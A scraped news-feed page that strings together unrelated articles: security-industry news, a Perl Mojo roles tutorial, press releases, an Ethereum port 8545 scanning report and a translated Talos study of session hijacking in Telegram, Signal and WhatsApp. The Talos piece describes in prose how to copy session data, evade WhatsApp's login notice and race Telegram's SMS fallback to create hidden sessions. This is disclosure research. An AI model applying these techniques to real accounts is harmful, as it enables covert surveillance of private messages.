Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

以赛促教,打造网络安全人才培育生态链

$
0
0

“千军易得,一将难求,要培养造就世界水平的科学家、网络科技领军人才、卓越工程师、高水平创新团队”“没有网络安全,就没有国家安全”――习近平总书记从国家网络空间安全战略层面提出了对网络安全人才的需求。

近几年市场的飞速发展,让“网络安全“人才成为稀缺资源。培养高水平的网络安全人才,需要从国家政策、科研教学、企业技术三个链路层面的全面配合和支撑。

政策建立积极引导的上层机制

全国高校信息安全铁人三项赛,正是由市场需求、校、企三方联合催生的产物。日前在北京航空航天大学成功落幕的2017-2018全国高校信息安全铁人三项总决赛汇聚来自全国57所高校的顶级赛队,以“数据赛、企业赛、个人赛“三个维度,建立了网络空间安全领域高水平实战人才的选拔和培养机制。

已连续成功举办两届的全国高校信息安全铁人三项赛,最大价值在于:它成为学校、企业、国家教育机构间共同培养人才的成熟化产业桥梁,为网络空间安全人才的培养建立了一种培育机制,而这种机制的良性运行,也将为其他行业的人才培养提供具有参考价值的范本。


以赛促教,打造网络安全人才培育生态链

在整个人才培养的产业链条中,国家政策和战略层面的支持成为至关重要的一环,这一点从大会组织架构即可看出端倪。2017-2018全国高校信息安全铁人三项赛由教育部学校规划建设发展中心、中国信息安全评测中心指导,教育部网络空间安全专业教学指导委员会协办。最大化引导高校积极参与,主动响应网络空间安全人才培养战略,积极开展教学改革探索,把产教融合融入到高校人才培养中,为市场化人才提供坚实政策支持。

教育企业用技术搭建实战桥梁

赛事不仅汇聚了国家权威教育部门和全国知名院校,网络安全相关企业也都踊跃参与其中。大赛由中国信息产业商会信息安全产业分会、北京航空航天大学、北京西普阳光教育科技股份有限公司共同主办,这样的组合,为校企联合培养人才提供了天然的土壤。

其中,网络安全教育领先企业的参与和培育作用,十分值得关注。在大赛前期阶段,西普教育为赛事提供了系统化的培训体系,用基础知识、直播讲解、实训练习全方位培训服务,为学生提供随时随地的学习机会,其在校训练营培训共计覆盖学校322家,13190名学员参与了此次定制化培训。


以赛促教,打造网络安全人才培育生态链

除了系统化的赛前培训,贴近实战是赛事为市场网络安全人才培养带来的最大价值意义。由于网络空间安全市场的新兴性质和技术化门槛,对学校人才实战性的培训成为非常大的挑战。西普教育基于私有云技术打造的“长城网络靶场竞技系统(SimpleCRC),可以为学生提供包括基础理论、夺旗闯关、主机渗透、攻防对抗、取证溯源、企业环境渗透、安全加固、自定义竞赛八个模式,覆盖目前国际国内主流的各项CTF赛事。同时该产品创新的实现了复杂企业网络架构功能,可以模拟搭建各类不同企业业务场景,实现企业真实网络和业务场景的仿真训练。


以赛促教,打造网络安全人才培育生态链

可以说,教育企业技术的进步为学生在日常赛事、培训和贴近市场实战提供了基础,为网络空间安全人才的实战化培养提供了平台。

学校从学科建立上给予根本支撑

教育机构的支持调动了主流院校的参与热情,教育企业提供的产品平台支撑搭建了实战培训的桥梁,学校的支持是从教学内部提供了根本支撑。网络空间安全专业成为新成立的一级学科,为学生掌握网络空间安全的基础理论和关键技术提供源头上的支持。目前,国内已经有44所院校开设了网络空间安全专业,93所院校开设了信息安全专业,全国共有29所高校设立了网络空间安全一级学科博士点。


以赛促教,打造网络安全人才培育生态链

为了更好建立人才培养机制,大赛也通过学校和企业导师+学生团队的模式,将企业资源纳入高校信息安全相关专业人才培养中,实现人才从高校到企业的无缝对接。

铁人三项赛的创立和举办,一方面有助于网络空间安全认证和培训体系的建立,填补网络空间安全人才缺口和实现人才定型培养,另一方面也有助于高校多模式培养机制的构建。在市场对人才需求缺口的时候,以教育机构拉动,校企共同促进的方式,能够最快速响应市场需求,实现人才的素质化培养。


Day 13: Taking on Roles

$
0
0

In my previous Advent article, I created higher-order promises and showed you how to use them. I didn't show you the magic of how they work. Now I'll develop another example but from the other direction.

There are times that I want Mojo::File to act a bit differently than it does. Often I have a path where I want to combine only the basename with a different directory. I end up making Mojo::File objects for both and then working with the directory object to get what I want:

use Mojo::File qw(path); my $path = Mojo::File->new( '/Users/brian/bin/interesting.txt' ); my $dir = Mojo::File->new( '/usr/local/bin' ); my $new_path = $dir->child( $path->basename ); say $new_path; # /usr/local/bin/interesting.txt

That's annoying. I don't like that it takes so many steps. There are a few methods that I'd like instead. I'd rather be able to write it like this, where I start with the interesting file and keep working on it instead of switching to some other object:

use Mojo::File qw(path); my $new_path = Mojo::File ->new( '/Users/brian/bin/interesting.txt' ) ->rebase( '/usr/local/bin' ); # this isn't a method say $new_path; # /usr/local/bin/interesting.txt

I could go through various Perl tricks to add this method to Mojo::File through monkey patching or subclassing. But, as usual, Mojolicious anticipates my desire and provides a way to do this. I can add a role,

You can read about roles on your own while I jump into it. First, I create a class to represent my role. I define the method(s) I want. I use the name of the package I want to affect, add ::Role:: , then the name I'd like to use; it's not important that its lowercase. Mojo::Base sets up everything I need when I import -role :

package Mojo::File::Role::rebase { use Mojo::Base qw(-role -signatures); sub rebase ($file, $dir) { $file->new( $dir, $file->basename ) } }

I apply my new functionality by using with_roles on the class I want to affect. Since I used the naming convention by prefixing it with the target class ( Mojo::File ), then ::Role:: , then the short name I want. When I apply this, I can leave off most of the package name and use the short name preceded by a plus sign:

my $file_class = Mojo::File->with_roles( '+rebase' );

Alternately I could have typed out the full package name:

my $file_class = Mojo::File->with_roles( 'Mojo::File::Role::rebase' );

I'd need to use this if I didn't follow the naming convention:

my $file_class = Mojo::File->with_roles( 'I::Totally::Rejected::The::Convention::rebase' );

The $file_class is a string with the new class name. Behind that class there is some multiple inheritance magic that you'll be much happier ignoring. I don't need to use a bareword class name to call class methods; a string in a scalar variable works just as well. Now I can use my rebase :

say $file_class ->new( '/Users/brian/bin/interesting.txt' ) ->rebase( '/usr/local/bin/' );

That's much cleaner than what I was doing before and I like how this flows. But what if I get an already-created Mojo::File object from something else? I can apply the role ad hoc too:

my $file = path( '/Users/brian/bin/interesting.txt' ); say $file ->with_roles( '+rebase' ) ->rebase( '/usr/local/bin/' );

I can go further. Any methods I add to my role become part of the class. I often want to get the digests of files and although Mojo::Util makes that easier with some convenience functions, I want even more convenience. I add a couple of methods to my role to do the slurping for me:

use Mojo::File; package Mojo::File::Role::MyUtils { use Mojo::Base qw(-role -signatures); use Mojo::Util qw(md5_sum sha1_sum); sub rebase ($file, $dir) { $file->new( $dir, $file->basename ) } sub md5 ($file) { md5_sum( $file->slurp ) } sub sha1 ($file) { sha1_sum( $file->slurp ) } } my $file = Mojo::File ->with_roles( '+MyUtils' ) ->new(shift); say $file->sha1; say $file->md5;

You can read more about roles in Joel Berger's 2017 Mojolicious Advent Calendar entry Day 13: More About Roles . Curiously that was on Day 13 too, although I don't think Joel or I were clever enough to plan that.

Image by Viv Lynch CC BY-NC-ND 2.0

RingCentral Deploys Data Theorem to Automate Security Inspection of Modern Apps ...

$
0
0
Global Communications Company Identifies Pre-Production Critical
Security Flaws and Closes Vulnerability Cases Faster with Automated API
Discovery and Security Inspection PALO ALTO, Calif. (BUSINESS WIRE) Data Theorem, Inc., a leading provider of

modern

, today announced that RingCentral has deployed

its automated API discovery and security inspection solution seamlessly

into RingCentral’s DevOps and continuous integration/continuous delivery

(CI/CD) program to identify and address vulnerabilities in its modern

application environment. As a result, RingCentral has found and fixed

critical security flaws before releasing into production and closed more

vulnerabilities faster than previously possible.


RingCentral Deploys Data Theorem to Automate Security Inspection of Modern Apps  ...

RingCentral,

(NYSE: RNG) is a leading provider of global enterprise cloud

communications and collaboration solutions empowering today’s mobile and

distributed workforce to communicate, collaborate, and connect from

anywhere, on any device. RingCentral unifies voice, video, team

messaging and collaboration, conferencing, online meetings, and

integrated contact center solutions. Its open platform integrates with

leading business apps and enables customers to easily customize business

workflows. RingCentral is headquartered in Belmont, Calif., andhas

offices around the world.

“ Data Theorem’s analyzer engine is unique in its ability to

deliver continuous, fully automated security for our mobile and API

environment, which is very important to us,” said Michael Machado, Chief

Security Officer for RingCentral. “We want to ensure that our customers

are communicating and collaborating in a secure ecosystem, and Data

Theorem’s testing of our mobile apps and APIs is an important part of

our software security testing program.”

Previously RingCentral used pen testing for gauging the security of its

mobile apps. As the company’s Unified Communications as a Service

(UCaaS) solutions evolved to heavily incorporate mobile applications,

RingCentral needed a better solution for its product security activities

that delivered scalable, flexible and continuous security testing of its

mobile apps. While traditional pen testing is a relevant part of mature

software security testing programs, its limitations include being slow

and inefficient, and often results in only periodic, point-in-time

testing.

“Data Theorem has proven very efficient and accurate in continuous

testing of each mobile app release,” said Machado. “It is an important

component of our secure software development program. In addition to

their security testing, which is industry leading, the Data Theorem team

is a great partner to work with. They are extremely focused on making

their customers successful and this goes beyond their product, which

is itself world class.”

With Data Theorem, the RingCentral team receives fully automated

security reviews of its apps in app stores. RingCentral’s developers and

security teams can log in at any time to check status, review flaws and

alerts, and receive coding-level recommendations for how to address

discovered issues. Apps are analyzed in pre-production, allowing

critical issues to be detected and addressed prior to release, as well

as tested in post-production. Data Theorem’s App Secure product performs

static and dynamic analysis on any iOS and Android application in search

of security vulnerabilities and privacy gaps.

“RingCentral is one of the world’s leading providers of enterprise cloud

communications and collaboration solutions, and we are pleased to work

with them to help identify issues related to privacy and

application-layer attacks,” said Doug Dooley, Data Theorem COO.

“Companies turn to Data Theorem to address threat models related to

modern mobile applications with continuous mobile application and API

security testing in production environments.”

Data Theorem’s API Discover and API Inspect together address security

concerns such as Shadow APIs, Serverless Applications, and API Gateway

cross-check validation by conducting continuous security assessments on

API authentication, encryption, source code, and logging. The API

security solutions support Amazon’s Lambda and API gateway tools to

discover modern APIs and to enumerate the specification using standards

such as Swagger and Open API 3.0.

About Data Theorem

Data

is a leading provider of modern application security. Its

core mission is to analyze and secure any modern application anytime,

anywhere. The Data Theorem Analyzer Engine continuously scans APIs and

mobile applications in search of security flaws and data privacy gaps.

Data Theorem products help organizations build safer applications that

maximize data security and brand protection. The company has detected

more than 300 million application eavesdropping incidents and currently

secures more than 4,000 modern applications for its enterprise customers

around the world. Data Theorem is headquartered in Palo Alto, Calif.;

with offices in New York; Paris, France; and Bangalore, India. For more

information visit www.datatheorem.com .

Data Theorem and TrustKit are trademarks of Data Theorem, Inc. All other

trademarks are the property of their respective owners.

Contacts

Dan Spalding

dan@datatheorem.com

(408)

960-9297


RingCentral Deploys Data Theorem to Automate Security Inspection of Modern Apps  ...
Do you think you can beat this Sweet post? If so, you may have what it takes to become a Sweetcode contributor...Learn More.

Foxtel hit with $25K fine for telemarketing breaches

$
0
0

Broadcast giant Foxtel has been caught in a crackdown on compliance to telemarketing laws and fined $25,200 for breaching requirements for telemarketers to end a call immediately when asked.

The penalty was imposed on Foxtel after an investigation by Australia's Communications and Media Authority (ACMA) found that the company continued to sell its products and services within calls after consumers indicated they wanted to end the calls.

The ACMA also found Foxtel did not have adequate contractual arrangements in place with a call centre it used.

“Consumers have the right to end a telemarketing call at any time during the call. It’s unacceptable for a call to continue once someone has indicated they want it to stop,” said ACMA Chair Nerida O’Loughlin.

O’Loughlin warned that the ACMA will act “when aggressive marketing practices don’t meet acceptable standards”.

This year, the ACMA has cracked down on businesses breaking telemarketing laws, with businesses paying a total of $343,200 in infringement notices.

“Telemarketers are on notice to listen and respond appropriately to consumers and take their obligations seriously,” O’Loughlin warned.

The Telemarketing Industry Standard sets out minimum obligations for all telemarketing calls that set out clearly permitted calling times, the information to be provided during calls and when calls must be terminated.

Penalties for businesses in breach of Australia’s telemarketing laws include formal warnings, infringement notices or action in the Federal Court.

47 REASONS TO ATTEND YOW! 2018

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

YOW! 2018 is a great place to network with the best and brightest software developers in Australia. You’ll
be amazed by the great ideas (and perhaps great talent) you’ll take back to the office!

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

LEARN HOW TO REDUCE YOUR RISK OF A CYBER ATTACK

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!

帮助特斯拉找漏洞 自由黑客年赚50万美元

$
0
0

帮助特斯拉找漏洞 自由黑客年赚50万美元

腾讯科技讯 据外媒报道,道德黑客平台Bugcrowd发布的新数据显示,自由职业精英黑客帮助特斯拉等大公司和国防部等政府机构寻找和报告安全漏洞,每年可以赚逾50万美元。

Bugcrowd公司成立于2012年,是少数几家所谓的“捉虫赏金”公司之一。这些公司为黑客们提供了一个施展才华的平台,让他们为需要测试安全的公司寻找安全漏洞。

黑客们与特定的公司签署明确的合同,帮助这些公司寻找安全漏洞,一旦他们在这些公司的基础设施中发现漏洞,他们就会得到赏金。他们的酬劳多少取决于安全漏洞的严重性。

Bugcrowd公司首席执行官凯西o埃利斯(Casey Ellis)表示,由于网络安全领域存在数百万个空缺职位,因此很多公司越来越多倾向于雇用安全专家来测试网络安全。据估计,到2021年,网络安全行业可能会有多达350万个空缺岗位。

埃利斯称,去年,该公司为一个安全漏洞支付了最大一笔酬劳11.3万美元,这是在一家大型科技硬件公司中发现的漏洞。相关数据显示,在2018年,这方面的支出额同比增长37%。

这项调查显示,有一半的道德黑客――被公司雇用来代表它攻击其网络和计算机系统的安全专家――表示,他们有全职工作。约80%的人表示,他们的技能帮助他们在网络安全领域找到了一份工作。埃利斯说,对于前50名黑客来说,平均每年支出的酬劳约为14.5万美元。

据埃利斯说,赚钱最多的黑客具有某些必要的技能。

“他们会发现某种特定的安全漏洞,然后在不同的公司中利用这个漏洞。他们还会在整个网络空间寻找尽可能多的机会来利用这个漏洞。”埃利斯说。

“他们还有很好的侦察技能,能够了解什么漏洞可能对一个组织造成最大的破坏,并据此进行相关的操作。了解企业如何运作,或其基础设施是如何建设的,这真的很有帮助。”他补充说。

虽然Bugcrowd公司中有94%的赏金猎手年龄在18岁到44岁之间,但是还有一些人仍然在读高中或初学。埃利斯说,进入这个行业的成本很低,主要看技能。该平台上有大约四分之一的黑客没有大学学位。

为了防止遭到网络攻击,很多公司让拥有黑客技能的人来测试它们的安全防御能力。一些公司使用自己内部的安全测试人员,通常将他们放在所谓的红队中,扮演试图恶意摧毁公司服务器或窃取信息的角色。

另一些公司则使用提供这项服务的咨询公司,或者像Bugcrowd、HackerOne、Synack和Cobalt这样的捉虫赏金公司。或者,他们只是提供一个向其报告安全漏洞的电子邮件,让任何发现安全漏洞的人与他们联系。

埃利斯称,捉虫赏金计划提供了一种更正规的途径,黑客必须遵守相应的规则,例如不能从被测试的服务器跳到其他存有更敏感数据的服务器。

IJet公司和特斯拉会根据每个安全漏洞的严重程度向黑客支付1000至1.5万美元的酬劳。万事达则就黑客发现的安全漏洞向他们支付最高3000美元的酬劳。今年10月,美国国防部将“攻击五角大楼”合同授予了Bugcrowd和HackerOne公司。(腾讯科技审校/乐学)

Ethereum Miners May Be Exposed to a Hacker Mass-Scan Campaign

$
0
0

Ethereum Miners May Be Exposed to a Hacker Mass-Scan Campaign

Think you’re working hard at making an extra income even while prices are down? If you’re not careful and don’t heed the warnings about port 8545, you may just see all your ETH disappear overnight.

According to crypto-jacking and cybersecurity research firm Bad Packets , a mass-scan campaign is active at the moment. Hackers are on the lookout for internet-exposed Ethereum mining equipment and wallets.

Bad Packets Co-Founder Troy Mursch told ZDNet that this scanning campaign has actually been active for over a week, starting on December 3.

Scanning for Exposed Wallets and Mining Equipment

Hackers search the net for any devices that have port 8545 exposed on the internet. If you’re not sure what that is, it’s basically the standard port for the JSON-RPC interface of certain types of Ethereum mining equipment (particularly Geth) and Ethereum wallets.

This JSON-RPC interface is an API that allows locally-installed services and apps to find relevant mining and price related information.


Ethereum Miners May Be Exposed to a Hacker Mass-Scan Campaign

For security reasons, the interface should, in theory, only be locally exposed. However, some mining equipment and wallet apps and make it available on all interfaces.

To add insult to injury, many of the JSON-RPC interfaces don’t come with a default password. This means that if the user has failed to set one, the device is completely exposed.

It’s easy money for the hacker. All they have to do is locate the wallet or mining equipment, send the right commands, and remove all the ethereum 0 0 from the victim’s address.

Port 8545 Is Not a New Problem

Ethereum has long been aware of the port 8545 issue and sent out a warning to all miners using Geth equipment back in 2015. They advised of the danger of using the type of equipment and also let Ethereum users know that this software exposes the API interface to the internet.

They also recommended that users took extra precautions by adding a password or using a firewall to block unwanted incoming traffic for port 8545.

The warning worked for some time, but memories are short in the crypto-sphere. While plenty of miners and wallet makers either took the appropriate precautions or removed the JSON-RPC interface completely, the effort wasn’t industry-wide.

Moreover, there’s more than one way to fall victim to vulnerabilities in the Ethereum network. Just last month, researchers found another major flaw that allowed hackers to drain exchanges by burning their ETH on high transaction costs .

Don’t Let Ethereum’s Tanking Price Deceive You

Back in 2015, hackers scouring for ETH were not so prevalent, but when Ethereum reached giddy heights of over $1,300 in January 2018, plenty of high-profile hacking attacks began coming to light.

Among the worst of these happened in June 2018 when a scanner managed to amass over $20 million worth of Ethereum at the then-price of around $600.

Since the price has tanked with the altcoin seeing some 90% shaved off its value, the port 8545 issue has been buried in the background.

But don’t let the low price deceive you. Even if ETH is trading at less than $100 these days, hackers are indiscriminate. They will still take a small amount from a lot of people and make a large profit over time. Said Mursch:

Despite the price of cryptocurrency crashing into the gutter, free money is still free, even if it’s pennies a day.

According to their Twitter account, Bad Packets found that the scan activity had actually tripled compared to last month despite the rock-bottom price.


Ethereum Miners May Be Exposed to a Hacker Mass-Scan Campaign

It’s thought that around 4,700 devices (most of which are Parity wallets and Geth mining equipment) are currently exposing their port 8545. Worse still? Hackers can even find free tools to exploit this vulnerability and attack Ethereum users through the port.

So if you’ve been lax on your security or focusing all your attention on the price, just remember never to leave your back door (or your port 8545) completely wide open.

Will this vulnerability further hurt ETH price? Share your thoughts below!

Images courtesy of Shutterstock, Bad Packets LLC

The post Ethereum Miners May Be Exposed to a Hacker Mass-Scan Campaign appeared first on Bitcoinist.com .

针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

$
0
0

针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究
一、前言

从互联网诞生以来,消息应用就一直伴随我们左右。然而最近一段时间,由于一些国家开始实施大规模监控策略,有更多的用户选择安装名为“安全即时通信应用”的端到端加密应用。这些应用声称可以加密用户的邮件、保护用户数据免受第三方危害。

然而,深入分析三款安全消息应用(即Telegram、WhastApp以及Signal)后,我们发现服务商可能无法信守各自的承诺,用户的机密信息可能存在安全风险。

考虑到用户之所以下载这些应用,是因为想让自己的照片和消息完全避免第三方威胁,因此这是一个严重的问题。这些应用拥有海量用户,无法保证这些用户都经过安全教育,很难都了解启用某些设置可能会带来的安全风险。因此,这些应用有义务向用户阐述安全风险,并且在可能的情况下,尽量默认使用更为安全的设置。这些应用会将安全性交由操作系统来负责,在本文中,我们将给大家展示攻击者如何通过侧信道攻击操作系统来破坏这些应用的安全性。本文深入分析了这些应用处理用户数据的背后原理,并没有深入分析这些企业自身的安全性。

二、安全消息应用

安全消息应用的背后原理在于所有通信数据都经过用户端点之间加密处理,没有涉及第三方。这意味着服务提供商在任何时间都不具备读取用户数据的能力。

为了实现端到端加密,这些应用要么会开发自己的加密协议,要么采用第三方协议。这些应用通常会使用两种协议:由Telegram安全消息应用开发的MT协议以及由Open Whisper Systems软件公司开发的Signal协议。由于MT协议并没有开源,因此其他应用大多会使用Signal协议或者采用该协议的修改版。其他协议会根据用户的请求来使用该协议(但默认情况下没有使用该协议),这不在本文分析范围中。Facebook Messenger以及Google Allo采用就是这种解决方案,前者具备名为“Secret Conversations”(秘密对话)的一种功能,后者具备名为“Incognito”(隐身)聊天的一种功能。之前研究人员已经分析过公开的源代码,也对实时通信数据做过黑盒分析。

然而,安全消息应用远不止加密协议这么简单。还有其他组件(如UI框架、文件存储模型、群注册机制等)可能是潜在的攻击目标。Electron框架中发现的CVE 2018-1000136 漏洞 就是一个很好的例子,WhatsApp和Signal都使用这个框架来构建用户接口。在最糟糕的情况下,攻击者可以利用这个漏洞远程执行代码,或者复制消息。

这些协议的关注重点是在传输过程中保持通信的私密性,然而并无法保证数据在处理时或者到达用户设备时的安全性。这些协议也不会去管理群注册的安全性,WhatsApp最近发现的 漏洞 就是典型案例。如果攻击者入侵了WhatsApp服务器,那么就可以在未经群管理员许可的情况下,将新成员加入群中。这意味着动机充足的攻击者可能会挑选并窃听特定的WhatsApp小组,从这个角度来讲该应用已无法保证所有通信数据的端到端加密。


针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

图1. Signal承诺保证用户消息安全(来源: http://www.signal.org)

除这些应用的技术层面之外,背后的用户也是不容忽视的一面。

这些应用都声称自己关注安全及隐私,某些应用甚至还声称自己能“不受黑客攻击”。这些宣传语的目的都是让用户建立对应用的信任。用户信任应用会保护自己隐私数据的安全。

由于这些应用都声称拥有数百万活跃用户,因此很明显并非所有用户都经过网络安全教育。因此,许多用户不能完全理解这些应用某些配置可能带来的安全风险及限制。保护用户的隐私安全并非只需要停留在技术层面,也需要以可接受的方式向用户提供正确信息,使用户即便不是安全专家,也能了解决策风险。


针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

图2. Telegram广告声称其能保障用户消息安全免受黑客攻击(来源: http://www.telegram.com )

这些应用还有另一个重要功能,即跨平台特性。所有应用都支持主流移动设备平台,也包含桌面版本。正常用户都会理所当然地认为所有平台上的安全级别都相同。所有应用的网站上也在暗示应用的安全性、隐私性在所有平台上都保持一致。


针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

图3. 网站提示用户可以在各种平台上使用应用(来源: http://www.signal.org )

然而安全功能的实现往往因具体平台而有所区别。有些平台上风险更多,并且这些风险也需要告知用户,因为用户通常会认为每个平台都能为他们提供相同级别的安全防护。

三、问题描述

这些主流应用的用户大多没有经过网络安全教育,这意味着用户会盲目信任这些应用能够保证其信息安全。显然,这种信任源自于应用对其自身服务的宣传方式。

2018年5月16日,Talos发表了关于 Telegrab 的一篇文章,介绍了可以劫持Telegram会话的恶意软件。原理非常简单:如果攻击者可以复制桌面用户的会话令牌(session token),那么就能劫持会话。除了本地存储的信息外,攻击者不需要其他任何信息。无论信息是否经过加密都不重要,只要复制这个信息,攻击者就能使用该新信息创建一个影子会话(shadow session)。

之后我们想继续研究这种技术能否适用于其他消息应用,事实证明我们测试的所有应用(Telegram、Signal以及WhatsApp)都受此方法影响。这些应用处理会话的方式有所不同,因此在某种程度上会影响这种攻击方法的效果。

在下文中,我们会描述我们研究的攻击场景,其中攻击者已经复制或者劫持了这些应用的会话。

四、应用分析 Telegram:桌面会话劫持

Telegram似乎是会话劫持(session hijacking)的最佳目标,攻击发生时用户并不会收到任何通知。受害者发送或者接收的消息以及图像也会原封不动传输至攻击者的会话。


针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

图4. Telegram桌面环境中存在2个会话

一旦攻击者使用窃取的会话信息启动Telegram桌面应用,用户不会收到关于新会话的任何通知。用户需要手动确认同时是否存在其他在用会话。用户需要转到设置页面才能发现该信息,这对普通用户来说并不容易。当该消息在Telegram上显示时,大多数用户也很难注意到消息内容。

Signal:桌面会话劫持

Signal以竞争条件(race condition)的方式来处理会话劫持。当攻击者使用已窃取的会话信息启动应用时,两方应用都会竞争这一会话。因此,用户会在桌面应用上看到错误消息,但移动设备上看不到错误消息。


针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

图5. 在Mac上创建的会话适用于windows系统(反之亦然)

然而,当受害者看到这些警告消息时,攻击者实际上已经可以访问尚未被删除的所有联系人和先前聊天新信息。

为了避免竞争条件,攻击者只需要简单删除会话信息即可。当用户启动应用时,会收到重新链接应用的一个请求。

这种情况对安全专家来说是一种红色警报,然而对普通用户而言,他们可能会认为这只是应用中的一个错误。


针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

图6. 同一台设备的两个会话

当用户创建第二个会话时,只有移动设备能看到该会话,并且默认情况下,两个会话都使用同一个名称。

因此,攻击者可以查看甚至仿冒受害者。攻击者发送的消息也会传到受害者的合法设备上,但攻击者可以在发送消息的同时删除这些消息,避免被用户发现。如果攻击者在仿冒过程中使用了“Disappearing messages”功能,那么受害者更难发现这种攻击行为。

WhatsApp:桌面会话劫持

WhatsApp是唯一实现了通知机制的一款应用。在正常操作下,如果攻击者使用已窃取的会话信息在桌面上打开第二个会话,那么受害者应该会收到一则警告消息,如下图所示:


针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

图7. WhatsApp多登录通知

当创建第二个会话时,在线的应用会收到这个通知消息。在用户做出决定之前,第二个会话处于有效并可用状态。因此,当出现此通知时,攻击者已经可以访问受害者的所有联系人消息及先前消息。攻击者也可以仿冒受害者,直到受害者对该窗口做出决断。假设攻击过程中受害者没有在设备旁,那么在受害者返回前攻击者一直都具备访问权限。如果受害者使用的是移动设备,那么他们并不会收到明显的警告信息。如果受害者使用的是桌面客户端,那么每次复用会话时都能看到这则通知。第二个会话不能修改警告。

这种告警机制仍存在缺陷,攻击者可以通过如下步骤绕过:


针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

图8. 绕过WhatsApp多登录通知步骤

攻击者可以简化上述步骤,跳过步骤4,在执行步骤5之前静静等待。这样结果一样,因为双方都能访问相同的消息。只有当受害者在移动设备上手动终止会话,攻击者才会失去访问权限。

根据我们的协调披露政策,我们已经将漏洞反馈至Facebook,大家可以访问 此处 了解所有公告详情。

Telegram:移动版影子会话

不单单是桌面环境存在会话滥用问题,实际环境中已经有攻击者通过克隆的移动应用滥用这些会话。


针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

图9. 移动设备上的影子会话

在移动环境中,攻击者不必担心会话被入侵,在正常情况下攻击者很难获得会话数据。然而这里根本的问题在于,Telegram会根据同一个手机号码,允许同一台设备上存在影子会话(shadow session)。

这就存在一种攻击场景,在会话被终止前,攻击者可以读取Telegram中的所有消息以及联系人。在移动设备上,除非用户通过选项菜单请求终止会话,否则会话永远不会被终止。

Android平台上还有另一种攻击场景,恶意应用可以在无需用户交互的情况下创建影子会话。恶意应用只需获取“读取短信”和“结束后台进程”的权限即可,而这些权限请求行为通常不会被当成危险行为,可以轻松通过Google Play的审核。

Telegram注册过程首先会请求获取手机号码,然后通过包含唯一码的SMS确认手机号码有效。如果用户尝试再次注册同一个手机号码,Telegram会通过Telegram频道(而非SMS)发送一个验证代码。

将传输渠道从SMS切换成Telegram消息应当能够避免恶意应用在无需用户交互的情况下创建影子会话,因为恶意应用无法读取验证码。然而,如果注册过程无法在一定时间内顺利完成,Telegram就会假设用户无法访问Telegram应用,会通过SMS发送新的验证码。

这种备份机制造成了竞争条件,可以被恶意应用利用,在无需用户交互的情况下创建影子会话。整个操作过程如下:


针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究

图10. 创建Telegram影子会话

从此时起,恶意应用就可以访问所有联系人、不属于“Secret chats”的以前以及未来消息。

五、总结

安全即时消息应用可以在消息传输过程中保证信息安全性,甚至可以保护这些消息不受应用服务器的影响。然而,在保护应用状态及用户消息方面,这些应用有点力不从心,会将信息保护责任交由操作系统来承担。

Signal协议开发者已经预见到会话劫持可能。会话管理协议( Sesame 协议)安全考虑中包含一个子章节,专门针对设备被入侵的情况,其中提到一句话:“如果攻击者成功获知设备的秘密数据,比如身份私钥以及会话状态,那么安全性将会受到灾难性影响”。

鉴于协议开发者已经预见到这种攻击方式,因此个人用户或者企业不应当认为这些应用固若金汤。因此,如果企业使用这些应用来传输私密或者敏感消息,那么他们应该部署能够更好保护这些资产的端点技术,这一点非常重要。

Virtru Strengthens Leadership Team with Nationally Recognized Data Privacy Advoc ...

$
0
0
Former DOD, Endgame Social Scientist Andrea Little Limbago Joins
Leadership Team at D.C.-based Enterprise Data Privacy Innovator

WASHINGTON (BUSINESS WIRE) lt;a href=”https://twitter.com/hashtag/cybersecurity?src=hash” target=”_blank”gt;#cybersecuritylt;/agt; Virtru ,

an innovator in enterprise data protection and

data

, has added Dr. Andrea Little Limbago to its

leadership team as chief social scientist. Limbago brings a combination

of data privacy and security policy, user experience and cybersecurity

expertise to the role. She will help steer Virtru’s contributions to the

growing national and international data privacy dialogue, while

delivering cutting-edge and intuitive data protection technologies that

empower enterprises.


Virtru Strengthens Leadership Team with Nationally Recognized Data Privacy Advoc ...

Limbago has previously provided computational social science leadership

in the Department of Defense (DOD), building technical teams that focus

on building software at the intersection of human and computer

interaction. For almost two decades, Limbago has researched and

presented on the impact of the shifting data environments on democratic

values, geopolitical shifts, and economic security. Her doctoral studies

focused on the intersection of conflict, financial flows and domestic

institutions, which quickly transitioned into related research at the

Joint Warfare Analysis Center (JWAC). While at JWAC, Limbago was the

technical lead of a team of computational social scientists, and earned

the command’s top award for technical support across the DOD.

Most recently, Limbago was the chief social scientist at Endgame, a

cybersecurity software company. While there, she spoke extensively

across the information security community, academia, and government,

introducing applied social science research and analyses to a range of

technical trends and challenges. Limbago will expand this footprint in

her new position at Virtru to focus even more explicitly on the

intersection of data privacy, data protection and national security and

geopolitics.

“We’re honored to welcome Dr. Limbago to our fast-growing team, where

she will help us continue to address data privacy as a fundamental

right,” said Virtru Co-founder and Chief Executive Officer John Ackerly.

“By building software solutions that return and retain ownership of data

